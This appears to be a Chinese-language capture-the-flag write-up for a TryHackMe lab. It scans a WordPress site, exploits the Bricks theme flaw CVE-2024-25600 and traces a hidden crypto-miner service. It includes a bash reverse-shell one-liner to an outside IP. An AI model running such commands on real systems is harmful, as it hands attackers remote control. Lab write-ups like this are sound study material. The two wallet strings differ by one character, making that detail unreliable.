TryHackMe-TryHack3M: Bricks Heist

flag01

What is the content of the hidden .txt file in the web folder?

访问ip会跳转bricks.thm(提前编辑好/etc/hosts)

1
nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm

image-20250321154731583

发现存在wordpress

image-20250321154939798

wpscan插件扫一扫

image-20250321154959438

使用了bricks主题

image-20250321155029306

尝试搜索相关漏洞https://github.com/Chocapikk/CVE-2024-25600

脚本利用

反弹shell

1
bash -c 'exec bash -i &>/dev/tcp/10.21.148.202/9999 <&1'

image-20250321155309493

拿到flag1

image-20250321155708917

flag02

What is the name of the suspicious process?

1
systemctl list-units --type=service --state=running

image-20250321160117913

1
systemctl cat ubuntu.service

image-20250321160426434

flag03

What is the service name affiliated with the suspicious process?

如上

flag04

What is the log file name of the miner instance?

1
cd /lib/NetworkManager/

image-20250321160541853

flag05

What is the wallet address of the miner instance?

1
5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d

image-20250321160641073

发现有规律

1
2
3
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
flag:
bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa

https://blockchair.com/

image-20250321160855717

image-20250321160926156